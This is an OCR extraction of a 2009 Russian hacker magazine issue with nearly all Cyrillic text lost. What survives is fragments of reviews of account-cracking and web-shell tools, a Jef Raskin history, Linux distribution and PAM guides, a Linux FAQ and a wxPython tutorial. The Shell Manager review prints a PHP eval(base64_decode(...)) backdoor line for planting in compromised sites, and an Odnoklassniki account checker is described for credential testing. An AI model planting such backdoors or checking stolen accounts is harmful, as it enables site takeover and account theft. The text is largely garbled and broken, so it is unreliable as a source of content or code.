--Betty_Bitch@stephenfry and ill be watching you on dave,
from Wales with love :)
--sjoes@stephenfry Are you in still Russia?
--mio@stephenfry wow o_0 where are you now, Stephen?
, , ,
From Russia with love ,
.

-
, ,
// . , ,
:).
P.S. ,

. z
/ETC/PASSWD
WARNING
warning

.
.
,

,

.
X 08 /128/ 09
063
>>
R0ID
/ R0ID@BK.RU /
>>

:MAIL.RU HISTORY READER
: WINDOWS 2000/XP
:GAR|K
-
IM-
.

.
mail- Mail.ru,
.

, -
. ,
, :). , Mail.ru
History Reader. mail-
.
:
1. , : blabla@
mail.ruhistory.txt
2. DVD

3. history-
:
C:\conv.exe blabla@mail.ruhistory.
txt blabla@mail.ru.txt
4. blabla@mail.u.txt,
:)
mail- <= 5.3,

Gar|k'
,
mail-.
.
: ODNOKLASSNIKI.RU
PASSWORD CHANGER & ACCOUNT
CHECKER
: WINDOWS 2000/XP
: ZDEZ BIL YA
-
,
.
064
,

odnoklassniki.ru
: Odnoklassniki.ru Password Changer
Odnoklassniki.ru Account Checker.
,
.
aka .
:

accounts.txt, : ;.

:
good_acc.txt ,
;_
bad_acc.txt ,
;_
error_acc.txt ,
,
,
bad_acc.txt, :

( )

,

.
:

accounts.txt, :
;.

:
good_acc.txt ,
block_acc.txt , ,
-

bad_acc.txt , -

error_acc.txt , ,
,
. ,
win32-,
PHP/-, . Zdez Bil Ya
:).
: SHELL MANAGER
: *NIX/WIN
: KRIST_ALL
, , web-. ,
,
,
:). :

? Krist_ALL'

Shell manager, . -,
, :
-
X 08 /128/ 09
>>
-
-
- PR//Alexa_Rank
-
( -,
-)
-

:
1. ,
( : password)
2.
3. ,
$install 1
:
//---- ---------------$db_host = ''; //
$db_login = ''; //
$db_password = ''; //
$db_name = ''; //
//---- Shell Mananger---$use_auth = 1; // 1 , 0
$install = 1; // 1,

$password = 'password'; //
.
4. - :
if(isset($_GET['m'])) {echo 1; exit;}
elseif(isset($_GET['ev'])) { $sss
=base64_decode($_GET['ev']);
eval($sss); exit; }
5. , -.
: FTP PARSER
:*NIX/WIN
: [QWYZ]
-
: ? ,
,
. ,

FTP Parser,
-
. PHP-
3 :
X 08 /128/ 09

- (, blabla.com)

, , :
$z = (, &z=com),
, * (,
&z=*)
$m = (, &m=14), ,
* (, &m=*)
$base = -,
./bases (, &base=file.txt)
$all = (, &all=1,&all=0)
$save = ( ./querie), ,
&save=yes,&save=no
$word =
(,
&word=blabla)
, , ,
./bases ( ) ./queries,
:
http://_/parser.
php?z=com&m=14&base=ftps.txt&all=0&s
ave=yes&word=freehostia.com
, .
: SYMVPN
:SYMBIAN
: TELEXY.COM
-
, - .

SymVPN
, VPN.
Symbian OS 3rd, ,
.
VPN-
SymVPN, PPTP
128- MPPE.
www.telexy.com, Symbian OS.
SymRDP (Symbian Remote Desktop Connection
Client), SymNC (Network Commander)
. , , x-USSR 40% (telexy.com/
Support/Publications.aspx?codeid=WGSBI6X6KV),
.
14 .
, ,
- 820 :).

(email, imei ). ,

IMEI- . ,

, :
1.
2.
3. , ,
(GPRS/Wi-Fi), IP-,
,
VPN-
4. .

,
VPN (IP///
DNS)
5.
( SymVPN)
.
, , VPN-
Symbiain- VPN.
,
.z
065
>>
1) Canon Cat
2) (70- )
3)
4)
MIFRILL
/ MIFRILL@REAL.XAKEP.RU /

IT .
, , ,
, .
, , .
Apple Macintosh, ,
, Apple .
,
,
,
, ,

.
, (Jef)
,
,
.

-, , ,
, .

26- 2005, 61
.
066
,

.

, -

,
:
. , ,
,
.
, ,

(, ,
,

?).

,
.
, , ,
.

.
,

,
Apple
,
,
.
Apple
1978 ,
31- . ,
23 1943,
,
,
.

,

, ,
,
.
Apple
. , , ,
,
,
.
X 08 /128/ 09
>>
3
,
-,
.
, , , IT

.

.

,
:
, .
, , . 70-

Western Wind ( ),
.
, ,

,

-

. Western Wind

(
, 70-)
,

.

, .
X 08 /128/ 09
4
,
? , ,
,
.
, Apple

(
),
!
, ,
, ,
,
( Apple II).
,
,

-
. , ,

(
, ).
.

,
, ,

.
.
, ,

, . 1964-1965
,
,
.
(1967)
,

. , 70-

,
,

.
, ,
Apple
,
, ,
.
APPLE,
,

, .
.

Apple,
Annie,
.
,

.
,
, ,

. ,

,
,
.
, ,
- ,

. , , ,
. ,
(Macintosh)
,

McIntosh, .

,

,
.
-
,
, Apple

.
,

Apple Lisa,
,
.
, -
067
>>
1) Canon
2) Apple Macintosh

( , , ).
, . Apple
, .
1
- , , .
, , [
] , ,
. ,
, ,
GUI
( ),
. ,
,
Lisa.
Apple III, .
( , Apple III $5000-8000), !
Apple III

, ,
. Apple Lisa, ,
Apple III, .
, ,
.
, , .
,
,
. , ,
Lisa , .
, ,
, , , . ,
apple- . ,
. ,
, , Xerox
.
, , .
,
,
, .
,
. ,
,
Macintosh Bicycle, . ,
, ,
,
, . ,
, -
.
1982 , ,
, ,
. ,
,
,
Apple.
. ,
Apple,
. Information Appliance, , .
Information Appliance
Apple II SwyftCard, SwyftWare.
-
, .
, .
, . ,
, ,
, ,
, .
, .
(, ),
, . , ,
, , , .
.
. ?
.
( GUI ),
,
, ,
.
.
SWYFT.
GUI SWYFT , , ,
-. , .
, SWYFT
, ,
. ,
,
, ,
. - , SWYFT
, , ,
.
LEAP (), ,
, Firefox, <Ctrl+F>.
, ,
LEAP-,
. , ,
LEAP
, , .. ,
, .

. , ,
, - , , QWERTY,
X 08 /128/ 09
>>
, .
SWYFT ,
.
(,
), ,
.
SWYFT
Apple II,
.
Information Appliance
,
-
Canon. , Canon
Motorola 68000 (
),
Canon Cat.
, ,
. 1987 ,
,
. .
,
(
20.000 ), ,
Canon
. ,
.
, Canon
, -
,

. , , ,
,
Apple NeXT Computers.
, ,
Canon
( ),

. , ,
.
, ,
.
X 08 /128/ 09
, , ,
,
Canon,

,

2000- !
THE, ARCHI
1989
Information Appliance,

- .
90-,
,

,

. ,
BAYCHI (Bay-Area Computer-Human
Interface) ,
-,
,
IT (,
BMW). , ,

,
,
.

The Humane Interface, 2000 .

: .

-, ,
, ,
:).

SWYFT The Humane Environmen (
THE),
The Humane Interface. ,
,
30 ,
( ,
-, ).
, IT- .
THE ,
Canon Cat. GUI,
, LEAP- ,
-, ..
- ,
, GUI ,
- ,
, .
, , ,
.
, ,
, THE - , ZUI Zooming
User Interface.
, ,
,
,
, 100%.
,
- .

, ,
.
,
1- 2005 ,
THE Archy. Archy
RCHI,

( )
(Raskin Center for Humane Interfaces).
,
.
, ,
26- 2005 .
,
,
.
Humanized Inc., Mozilla,

. , ,
?

,
. ,
GUI,
,
,
,
.
, ,
, ,
. z
069
>> unixoid
MOBLIN V2
UX (USER
EXPERIENCE)
BETA
LINUX MINT 7
GLORIA
FEDORA 11
LEONIDAS
CALCULATE
LINUX
DESKTOP 9.6
XFCE
BOBER
/ ZLOY.BOBR@GMAIL.COM /

Linux- - 2009
>> unixoid
GNU/Linux- , , - . , , z
.
FEDORA 11 LEONIDAS
: Fedora 11
: fedoraproject.org
: 9 2009
: GPL
: i586, x86_64, PPC,
PPC64, s390, s390x
070
: Intel Pentium II 400

, 256/384 M RAM (x86/x86_64), 3 ( 9 ).
Kernel 2.6.30, Glibc 2.10.1, Udev 141, HAL 0.5.12,
X.org 1.6.1.901, GNOME 2.26.0, KDE 4.2.90,
OpenOffice.Org 3.1.1
: 2010

, 9 18:00
FTP-
, ,
.
X 08 /128/ 09
>> unixoid

. : Desktop
Edition, LiveCD- GNOME KDE
( i686 x64 )
. 1
DVD 6 CD ( cd1). ,
. Desktop Edition

,
;
.
.
, 2008
Wikipedia
RHEL/Fedora Ubuntu, ,
: -
2 + 1
. , Fedora
6-8 ,
. LTS-, Ubuntu,
. . ,
Fedora,
DVD- (
docs.fedoraproject.org
ch-upgrade-x86.
html). ,
(
), Fedora 9
10, 11.
.
Fedora .
gcc 4.4, .
MinGW
Windows (
mingw32-*).
xt4.
xt4
Fedora 9, , ,
.
ext2/3. 48- ,
,
,
. , ext4

,
.
, ext4 . (Delayed
allocation), - 60
X 08 /128/ 09
MINTINSTALL
, , .
.
2.6.30 ,

. /
boot ext2/3; ext4
.
.
, ,

(, ).
, .

Presto. diff-,
.
60-80% . ,
yum install
yum-presto. , RPM
4.7.
, .
PackageKit , ,

.
, .
, , MIME. , GNOME.
KDE mp3-
, (JuK),
.
:
# rpm -Uhv http://download1.
rpmfusion.org/free/fedora/
rpmfusion-free-release-rawhide.
noarch.rpm http://download1.
rpmfusion.org/nonfree/fedora/
rpmfusion-nonfree-releaserawhide.noarch.rpm
# yum install gstreamer-pluginsbad gstreamer-plugins-ugly

,
20 .
, Bluetooth.
,
.
, ,
. , ,
:
# yum grouplist //
# yum groupinstall Russian

Support
(yum groupinstall XFCE).

, ,
PulseAudio,
, .

,
.
071
>> unixoid

Calculate Linux Desktop 9.7 KDE.
: Kernel 2.6.28.10, KDE 4.2.4, X.Org 7.4, OpenOffice 3.0.1.
:
;
;
2.5 KDE;
USB Flash DVD HDD.
2 Flash;
LiveDVD .
2 .
calculate --update :
# layman -S && emerge calculate
INFO
info
Intel
Moblin Linux
Foundation.

Moblin :
Acer, HP, ASUS, MSI

.
Anaconda . , ,
. ,

Setup Agent.
LiveUSB Creator, .
, , KPackageKit
. yum update
61 .
,
KDE .
GNOME .
CALCULATE

CALCULATE
LINUX MINT 7 GLORIA

: Linux Mint 7 Gloria
: linuxmint.com
: 26 2009
: GPL
: x86 (x86_64 )
: Intel Pentium AMD CPU, 512
( , 256 )
2.5
Kernel 2.6.28, Glibc 2.9, Udev 141, HAL 0.5.12rc1, X.org 7.4,
GNOME 2.26, OpenOffice.Org 3.0.1
: 2010
-
FEDORA LINUX
HTTP://WWW
links
DistroWatch
(distrowatch.com)
,
,

Linux,
/
OpenSolaris
xBSD.
072
X 08 /128/ 09
>> unixoid
MOBLIN
Linux Mint. , ,
Ubuntu +
( ) , 3- distrowatch.
com, openSUSE.
Mint 2006 ;
Clement Lefebvre.
Linux,
. Mint : , ,
,
. ,
- ,
.
APT- . ( , 1 ) .mint-,
, .
Software Portal . , Ubuntu.
5,
. Mint , Mint 1 Ada.
Linux Mint 7 Ubuntu 9.04 Jaunty Jackalope
LiveCD/DVD ,
. x86- (
64- ,
). GNOME.
Mint , ,
7 .
:
Main Edition LiveCD-, , ;
Universal Edition LiveDVD (1,3 ), X 08 /128/ 09
, .
, Main,
, .
. , Main
Edition, .
Live-
. . ,
.
Windows, . Computer.
mintDesktop, Compiz.
mintMenu KDE4.
; ,

Fedora 11 Spins
(fedoraproject.org/wiki/Releases/11/Spins),
: XFce ( ), Games,
Fedora Electronic Lab, Educations (
, ) AOS
(Appliance Operating System),
. OEM- . , .
Russian Fedora Remix 11 (www.
russianfedora.ru) Fedora . ;
, .
073
>> unixoid
Filter. , .
, . ,
. ,
Gnome Do.
,
: , , , ,
, , .
/etc/apt/source.list ,
Medibuntu.
Synaptic mintInstall, , .
.
. More Info
FEDORA
. Visit, .
Featured applications , .
Mint Gufw,
( ), Advanced. , mintNanny.
, /etc/hosts
0.0.0.0.
;
.
, Synaptic, russian
. GNOME
language-pack-gnome-ru.
CALCULATE LINUX DESKTOP 9.6 XFCE

: Calculate Linux Desktop 9.6 XFCE
: www.calculate-linux.ru
: 4 2009
: GPL
: i686, x86_64
: Intel Pentium Pro AMD Athlon CPU,
256/512 M RAM 3/6
Kernel 2.6.28.10, Glibc 2.8, Udev 141, HAL 0.5.11, X.org 7.4, XFCE 4.6.1,
OpenOffice.Org 3.0.1.3
Calculate Linux ,
Gentoo, Gentoo

. Calculate Pack
.
: Calculate Linux
Desktop (CLD) KDE 4.2.3/XFCE 4.6.1 Calculate Directory Server (CDS).
Ubuntu (.).
, . Calculate Gentoo,
. ( Perl-) Calculate,
, , ISO, ( , ).
Calculate Overlay (svn.
calculate.ru/overlay). , Google Group
(groups.google.com/group/calculatelinux) IRC- (irc.
calculate-linux.ru, -).
HDD USB-HDD ext4, ext3, ext2, ReiserFS, JFS XFS. FTP/
HTTP LiveCD. Torrent LiveDVD.
FTP
, . KDE
CLD, XFCE CLD. .
:
( - );
( 2
);
Memtest.
( ), , .
( XFCE-);
. DHCP- ,
Wicd.
Live- guest/guest.
root su.
LZMA-
, . OpenOffice.org 3.0.1, StarDict, Firefox 3.0.10
( Flash-), ClawsMail, Pidgin, XChat, GIMP 2.6.6, Audacious,
Mplayer gnome-mplayer. , .
, <Caps Lock>.
calculate. ,
, :
# calculate --update
(www.calculate-linux.ru/_) , ,
:
# alculate --disk=/dev/sda2
root.
ReiserFS,
GRUB MBR. . Calculate
, > 45 ( ), : alculate --disk=/dev/sda.
.
Gentoo emerge.
:
ISO - /usr/calculate/share/linux
calculate. ,
.
MOBLIN V2 UX (USER EXPERIENCE) BETA

: Moblin v2 UX Beta
: moblin.org
: 19 2009
: GPL
: Intel Atom (x86)
:
Moblin OpenSource-, Linux- , ,
- (MID, Mobile Internet Device)
.
Intel,
074
X 08 /128/ 09
>> unixoid
LINUX MINT
, , , Moblin
x86- AMD Geode VIA Nano/C7.
: Acer Aspire One, Asus eeePC 901, 1000H, Dell Mini
9, MSI Wind, Lenovo S10, Samsung NC10, HP Mini 1010 1120NR.
.
, ,
,
.
Moblin Fedora (
, 9). - ,
Clutter (clutter-project.org), OpenGL OpenGL ES
( , www.khronos.org/opengles).
Clutter OpenedHand,
Intel. , Clutter
GLX- X.org,
Android, Moblin Linux. , .
img- 700 ,
USB- CD.
dd.
image-writer (git.moblin.org/cgit.cgi/
moblin-image-creator/plain/image-writer).
Live- (netboot).
XFCE, . , X 08 /128/ 09
.
, - .
, .
.
. (
) Favourite Applications.
m_zone ,
Twitter Last.fm.
, .

(, ). ,
, .
Bickley (moblin.org/projects/bickley)
.
Moblin -,
Mozilla Gecko, , IM- Empathy (
Jabber, Gtalk, ICQ, MSN, IRC, Salut)
. Moblin Image Creator 2
(MIC2), Moblin.
,
. , , . ,
, , . z
075
>> unixoid

/ ZOBNIN@GMAIL.COM /
PAM
>> unixoid
PAM
UNIX. , .
,
USB-, chroot-
-.
FEDORA 11 LEONIDAS
PAM
PAM (Pluggable
Authentication Modules)
( PAM , z
2006 , ..) , ,
.

, ,
/ .
076
/bin/login, .
PAM /etc/passwd .
PAM,
/bin/login
. ,
PAM
,
(
!)
( chroot -
!)
.
PAM ,
/ .
/etc/pam.d. /etc/pam.d/
login, /bin/login:
# vi /etc/pam.d/login
auth
sufficient pam_self.so
no_warn
auth
include
system
X 08 /128/ 09
>> unixoid
PAM_ABL
account requisite
so
account required
account include
session include
password include
pam_securetty.
pam_nologin.so
system
system
system
PAM
,
, PAM-,
.
:
auth , ;
account , ,
;
session (,
);
password ,

( /usr/
bin/passwd).
, ,
()
. , (
,
/etc/security).
include,
( ).
system ( /etc/pam).
FreeBSD; Linux- Debian Ubuntu
common-*
(common-auth, common-session ..), Gentoo
Mandriva system-*.
PAM,
/etc/passwd :
auth required pam_unix.so no_warn
try_first_pass nullok
, ,
.
X 08 /128/ 09
. ,

, , (
, ). , , /etc/pam.d/
su, auth :
# vi /etc/pam.d/su
auth
sufficient pam_rootok.so
no_warn
auth
sufficient pam_self.so no_
warn
auth
requisite pam_group.
so no_warn group=wheel root_only
fail_safe
auth
include
system
pam_rootok, UID , , ,
.
( sufficient).
( root), pam_self,
, UID UID ,
.
,
( : vasya
su vasya, ,
su , ). pam_group
wheel, , ,
( requisite).
,
auth /etc/pam.d/system (
pam_unix, ).
.
, su ?

auth sufficient pam_deny.so.
pam_deny false.
, su
, root.
pam_permit, .
/etc/pam.d/su auth sufficient
pam_permit.so, su ,
, .
,
.
USB-

Linux-PAM
OpenPAM
,
auth. , ,
pam_guest,

, pam_ftpusers,
/etc/ftpusers, pam_securetty,

,
secure /etc/ttys ( /etc/securetty Linux).

,
.

,
USB-,
- . , , pam_usb.
USB-

. ,
. ?
.
FreeBSD pam_usb ,
Linux ( Debian/
Ubuntu). pam_usb
:
# apt-get install libpam-usb
pamusb-tools
USB- pamusbconf, :
# pamusb-conf --add-device _
,
, ,
077
>> unixoid
PAM
PAM Sun Microsystems, 1995 . PAM Solaris 2.3,
UNIX- , Linux,
FreeBSD, NetBSD Mac OS X. API PAM
XSSO. PAM :
, Solaris;
Linux-PAM, Linux;
OpenPAM, BSD-.
INFO
, . , y.
,
USB-:
# pamusb-conf --add-user root
info

Linux-PAM
Red Hat,

RedHat
3.0.4 (1996 ).
FreeBSD
OpenPAM
.
LinuxPAM.
, y
:
# pamusb-check root
pam_usb .
pam_usb auth .
PAM, , /etc/pam.d/
PAM
SSHD
common-auth.
, pam_unix.so,
auth sufficient pam_usb.so. ,
PAM
common-auth, , USB-,
.
.
fprint (www.reactivated.
net/fprint/wiki/Main_Page),

( USB-)
. ,
pam_fprint.
libfprint pam_fprint
Ubuntu Fedora
FreeBSD (/usr/ports/security/pam_fprint). ,
OPENPAM

PAM /etc/
pam.d
/etc/
pam.conf.
HTTP://WWW
links

PAM
: www.
xakep.ru/magazine/
xa/086/112/1.asp.
078
X 08 /128/ 09
>> unixoid
PAM
.
:
$ pam_fprint_enroll --enroll-finger 6
6 .
fprint ,
, 1 , 8
.
. pam_fprint auth
. /etc/
pam.d/common-auth ( /etc/pam.d/system FreeBSD)
auth sufficient pam_fprint.
so. required
sufficient,
( ;
).
,

PAM -
, , . X 08 /128/ 09
:
PAM-,
.
, , pam_listfile (
Linux-PAM). .
PAM-

/etc/users.allow:
auth sufficient pam_listfile.so item=user
sense=allow file=/etc/users.allow onerr=fail
,
:
WARNING
info
OpenBSD PAM .
PAM
Kerberos.
auth sufficient pam_listfile.so item=user

sense=deny file=/etc/users.deny onerr=fail
, item tty, user, rhost, ruser, group, shell.

/ , ,
, /,
..
pam_access.
-
079
>> unixoid
PAM FREEBSD
account (,
, ,
, ). ssh .
account: account required
pam_access.so /etc/security/access.conf
:
# vi /etc/security/access.conf
+ : ALL : 192.168.1
+ : good_guy : ALL
- : ALL : ALL
, ssh
192.168.1.0 good_guy. .

pam_lockout (ostatic.com/pam-lockout).
PAM: auth requisite pam_lockout.so user=bad_guy.
pam_alredyloggedin (ilya-evseev.
narod.ru/posix/pam_alreadyloggedin).
,
( , ,
<Alt+Fx>).
auth (
):
auth required /lib/security/pam_securetty.so
auth sufficient /lib/security/pam_alreadyloggedin.so
no_root
080
,
pam_pwdfile (cpbotha.net/software/pam_pwdfile).
,
/etc/passwd. , .
: FTP- vsftpd. , . : pam_pwdfile,
vsftpd.
/etc/pam.d/vsftpd:
auth required pam_pwdfile.so pwdfile /usr/local/etc/
vsftpd/vsftpd.users
account required pam_pwdfile.so pwdfile /usr/local/
etc/vsftpd/vsftpd.users
chpwdfile
(eclipse.che.uct.ac.za/chpwdfile) : :MD5--.
pam_abl (hexten.net/
pam_abl),
-.
UNIX . ,
,
. /etc/pam.d/sshd
auth required pam_abl.so config=/etc/
security/pam_abl.conf. . , , X 08 /128/ 09
>> unixoid
,
.
- . /etc/security/pam_abl.conf
:
# vi /etc/security/pam_abl.conf
//
host_db=/var/lib/abl/hosts.db
//
host_purge=2d
// 10
1
host_rule=*:10/1h
,
, CHROOT
, PAM- session
, . ,
.
pam_limits
Linux-PAM ( OpenPAM).
/etc/
security/limits.conf.
, pam_chroot (sourceforge.net/
projects/pam-chroot),
. ,
shell-, ftp- -
, . .
:
# echo 'session required pam_chroot.so' >> /etc/pam.d/
ssh
# echo 'vasya /usr/chroot' >> /etc/security/chroot.
conf
, vasya, ssh-, /usr/chroot .

pam_mkhomedir
Linux-PAM,
.
,
,
Windows/UNIX, .
, Active Directory
,
.
, AD,
UNIX-
:
# echo 'session required pam_mkhomedir.so skel=/etc/
skel/ umask=027' >> /etc/pam.d/common-session
pam_winbind,
AD, pam_ldap, , LDAP.
Linux pam_namespace.
(/tmp, )
. , /tmp
X 08 /128/ 09
.
, (race
condition), .
/etc/security/
namespace.conf ,
. /tmp:
# mkdir /tmp-inst
# chmod 0 /tmp-inst
# echo "/tmp /tmp-inst/ user root" >> /etc/security/
namespace.conf
# echo "session required pam_namespace.so" >> /etc/
pam.d/common-session
: /tmp ,
root ( /tmp-inst/).
/home (
) :
$HOME $HOME/$USER.inst/ user root

PAM- password ,
. ,
.
pam_cracklib

:
;
, ;
, (UnixOid, UnIxOiD);
- ( : unixoid,
: dioxinu);

, .
, pam_
cracklib /etc/pam.d/passwd, passwd.
:
password required pam_cracklib.so retry=3 minlen=8
dcredit=-2 ucredit=-1 ocredit=-1 lcredit=0
password required pam_unix.so use_authtok
: 6 , ,

(, ).
PAM ,
,
.
,
,
PAM, ( ).
www.
kernel.org/pub/linux/libs/pam/modules.html.
PAM,
Linux-PAM. z
081
>> unixoid
/ ZOBNIN@GMAIL.CO /, / GRINDER@UA.FM/, / DHSILABS@MAIL.RU/
-

MegaFAQ Linux
>> unixoid
Linux- ,
512 ASUS EeePC.
, ,
Firefox
.
Linux, 16 i486? , ,
,
, .
Q.
Linux . .
- ?
A. , , .
, /etc/init.d/rc
:
082
for i in /etc/rc$runlevel.d/S*
do
case "$runlevel" in
*) startup $i start ;;
esac
done
*) startup $i start ;;
*) startup $i start & ;;.
:
,
.

. , Linux , X 08 /128/ 09
>> unixoid

,
.

:
# echo "20" > /proc/sys/vm/
swappiness
/etc/sysctl.conf:
vm.swappiness = 20

.
,
, ( ),

,
:
INIT-NG
.
.
. ,
4 : A, B, C D, C ,
, , 15-20, D
, C. , C , D ,
C. , D .
. ? : cinit,
, . , cinit
D, C, D, .
cinit
: nico.schottelius.org/documentations/
speeches/metarheinmain-chaosdays-110b/
cinit/view.

InitNG (Init Next Generation).
z _03_2006).
, upstart,
, ~10 .
Q. ?
A.
(drakxservices Mandriva, systemconfig-services Fedora, services-admin
Ubuntu),
rcN.d-
(
, -
).
X 08 /128/ 09
Q. ?
A. free .
(
) ?
, ,

-, , .
.

( 512 ):
# dd if=/dev/zero of=/swap/sw-file
bs=1k count=524288
# mkswap /swap/sw-file 524288
# swapon /swap/sw-file

, (
swapon -a).
Q. ?
A. ,

20 30. ,
. ,
.

,
, OpenOffice,
GIMP,
, 70, , 80 85.
vm.pagecache = 90
vm.dirty_ratio = 50
Q.
?
A.

. hdparm,

. ,
:
$ hdparm /dev/sda
$ hdparm -i /dev/sda
,

:
MaxMultSect/MultSect /
,
(
);
PIO modes/DMA modes ,
(, , );
multcount ;
I/O support
(16- , 32- 32 );
using_dma DMA ;
readahead .

(
) /etc/hdparm.conf /etc/
default/hdparm ( ).

hdparm -tT /dev/sda.
DMA (-d1), 32-
083
>> unixoid
/
,

Linux /
(I/O scheduler) . I/O scheduler , /sys/
block/sda/queue/scheduler:
# cat /sys/block/sda/queue/scheduler
noop anticipatory deadline [cfq]
SYSTEM-CONFIG-SERVICES
CFQ (Completely Fair Queuing), ,

,
, ,
I/O . Deadline Anticipatory:
I/O (c1); multicount (-m64),

multicount (-a64).
-u1 ,
:
# echo anticipatory > /sys/block/sda/queue/scheduler

# hdparm -u1c1d1m64a64 /dev/sda
: O(1), CFS (Completely Fair Scheduler, ,

2.6.23) , , , .
, z_12_2007.
-W (0/1), /
. -
FREE
084
X 08 /128/ 09
>> unixoid

.
Q. ?
A. nice,
, ionice

. Ubuntu ionice
schedutils.
:
ionice -c -n -p PID
0 7 ( ,
). :
1. Real time ,
(8
[0-7]);
2. Best Effort ,
(8
);
3. Idle ,
; .
PID :
$ sudo ionice -c2 -n0 mplayer
Q. ?
A. .
,
, . , , ext3,
Linux-.
, :
.
, ,
.
,
,

. :
#1. ,
/.
#2. /usr, .
#3. /home,
.
#4. /tmp, .
#5. /var, .

,
(
)? : .
ext2 (
X 08 /128/ 09
DRAKXSERVICES
) noatime ( ).
/tmp,
, atime .
/var ,

ReiserFS, /home ,
.
, /tmp
tmpfs,

. ,
, .
/etc/fstab:
tmpfs /tmp tmpfs size=512m,mode=1777
00
: ,
ext4.
, ,
, , ext4
,
.
Q. ?
A.
,
X.org. ATI nVidia,
- 2D- (
), .

nv,
KDE 4.1.1.
UT, 166
( ),
1 , 2.6-
.

XFCE. ?
, nv,

2D- ( 2D) .
, nvclock (www.linuxhardware.org/
nvclock), , .

nVidia 5900FX. -
Far Cry ( wine).

,
nvclock -f -n 540, 400 540,

.
3D-
. , (
, 3D- ),

.
Q. Compiz?
A. . , Ubuntu

.
:
# gtk-window-decorator --replace
( GNOME)
# kde-window-decorator --replace
085
>> unixoid
UBUNTU
( KDE)
Q. -
?
A. , . ATI nVidia,
, ,
GPU. Khronos Group,
OpenCL (www.khronos.
org/opencl), GPU . ,
,
.
. Linux
Memory Technology
086
Device (MTD),
,
, PCI. , en.gentoo-wiki.com/
wiki/TIP_Use_memory_on_video_card_as_swap,
()
,
.
,
, /tmp. :
,

VGA-.
Q. - , .
?
A. Linux
IPv6.
IP , . , ipv6,
/etc/modprobe.conf,
, /etc/modprobe.d/
blacklist.local blacklist ipv6.
, / TCP window
scaling,
TCP-,
,
.
:
# sysctl -w net.ipv4.tcp_window_
scaling=0
X 08 /128/ 09
>> unixoid
,
/etc/sysctl.conf:
net.ipv4.tcp_window_scaling=0
TCP window
scaling,
TCP- :
net.ipv4.tcp_rmem = 4096 87380
174760
net.ipv4.tcp_wmem = 4096 87380
174760
UDP:
net.ipv4.udp_rmem_min = 16384
net.ipv4.udp_wmem_min = 16384
net.ipv4.udp_mem = 8388608 12582912
16777216
Linux 2.6
,
:
net.ipv4.tcp_no_metrics_save = 1
net.ipv4.tcp_moderate_rcvbuf = 1
net.core.netdev_max_backlog = 2500
,
: sysctl -a | grep tcp.
.
txqueuelen
ifconfig:
# ifconfig eth0 txqueuelen 1000
2.6.7, reno
( ).
, :
# sysctl net.ipv4.tcp_available_
congestion_control
,
.
6 : reno, cubic, bic, htcp, vegas westwood.
,
cubic htcp,
. ,
,
westwood.
:
sysctl -w net.ipv4.tcp_congestion_
control=htcp
Q.
?
A.
X 08 /128/ 09
cron,
,
/etc/cron.hourly
(), /etc/cron.daily (), /etc/
cron.weekly () /etc/cron.monthly
().
,
,
.
/etc/cron.hourly (
).
Q.
?
A. , !
mcompress, :
#!/bin/sh
VER=' uname -r`
MAJ='uname -r | awk -F. '{print $1}'`
MIN='uname -r | awk -F. '{print $2}'`
if [ $MAJ -ge 2 -a $MIN -ge 5 ]; then
OBJ=ko
else
OBJ=o
fi
find /lib/modules/'uname -r'/ -name
*.$OBJ -exec gzip -9 '{}'';'
depmod -a; depmod -A
Q.
?
A. . :
xsane, sane-utils, libsane, foomatic-db-hpijs,
hpijs, hplip
HP ( HP, ,
,
);
w3m ( , ?
);
bogofilter, bogofilter-{bdb,common} ;
splix Samsung
SPL2 ( Lexmark, SPL2
);
gucharmap ;
onboard ;
rss-glx .
. .

,
. , ttf-arabeyes,
ttf-lao, ttf-arphic-uming, ttf-sazamani*, ttf-indic*,
ttf-unfonts-core, ttf-thai* .

80 .

.
.
. OpenOffice GIMP?
, ,

.
, , .
,
README, CHANGES, GPL, LICENSE, AUTHORS,
ChangeLog .. , !
.
/usr/share/doc , .
,
- ,
,
.
250 .
Q.
?
A. ,
.
.
.
,
3-5%,
Gentoo Stage1
:
O2
.
fomit-frame-pointer
.
funroll-loops .
mcpu=_ .
march=_ +
.
pipe
( ).
-mcpu -march
: gcc.gnu.org/onlinedocs/gcc/i386and-x86_002d64-Options.html.
.
, totem,
amarok, k3b, firefox, thunderbird
. wmii, ion3 awesome,
mc , links2, dillo
elinks web, mutt
, snownews RSS, sonata
+ mpd , mplayer .

,
.

.
.

,

screen/tmux. z
087
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
GUI PYTHON!
/SHPAK.VADIM@GMAIL.COM/

, .
. GUI
Python.
GUI PYTHONE

GUI. Python . GUI
. -, ,
Python. -, GUI-.
GUI-: Tkinter Tcl/Tk, wxPython
wxWidgets, PyQt Qt ( , ). Tkinter
Python, GUI .
wxPython. GUI-
wxWindows.
IDE
IDE, GUI. , , ,
. , wxPython BoaConstructor. GUI:
, ,
( ). IDE ,
.
.
wxPython .
HELLO, WORLD!
:
GUI GUI! ,
Hello, world! wxPythone.
++++
import wx
++++
++++
++++
class HelloFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self, id=-1, parent=None,
pos=wx.Point(422, 270), size=
wx.Size(300, 200), title=Hello Frame)
self.panel = wx.Panel(self)
self.helloButton = wx.Button(id=-1, label=
Push me.,parent=self.panel,
088
pos=wx.Point(110, 75), size=wx.Size(80, 30))

self.panel.Bind(wx.EVT_BUTTON,
self.OnButtonClick, self.helloButton)
def OnButtonClick(self, event):
print Hello, world!
class HelloApp(wx.App):
def OnInit(self):
frame = HelloFrame()
frame.Show(True)
return True
if __name__ == __main__:
app = HelloApp()
app.MainLoop()
, Hello, world!.
?
. wxPython-
: .
,
, . :
1) app = wx.PySimpleApp() ,
wx.App . ,
wxPython.
2) OnInit() .
. False, .
3) frame = HelloFrame() (
wx.Frame ). , , OnInit()
,
! ( ), .
( SetTopWindow()) ( , ).
X 08 /128/ 09
>> coding
BOACONSTRUCTOR IDE GUI

4) app.MainLoop() .
, ( ).
, MainLoop()
. OnInit() , OnExit()
, wxPython.
-wxPython . -
,
,
SetExitOnFrameDelete(False).
, wx.Exit().
, .
, .
():
wx.Frame(parent, id=-1, title=,
pos=wx.DefaultPosition, size=wx.DefaultSize,
X 08 /128/ 09
style=wx.DEFAULT_FRAME_STYLE, name=frame)
,
. .
id, .
id.
:
1)
.
2) wx.NewId().
3) wx.ID_ANY -1 (
).
-
089
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
, .
: self.panel.Bind(wx.EVT_BUTTON, self.OnButtonClick, self.
helloButton).
panel , , helloButton, OnButtonClick(self,
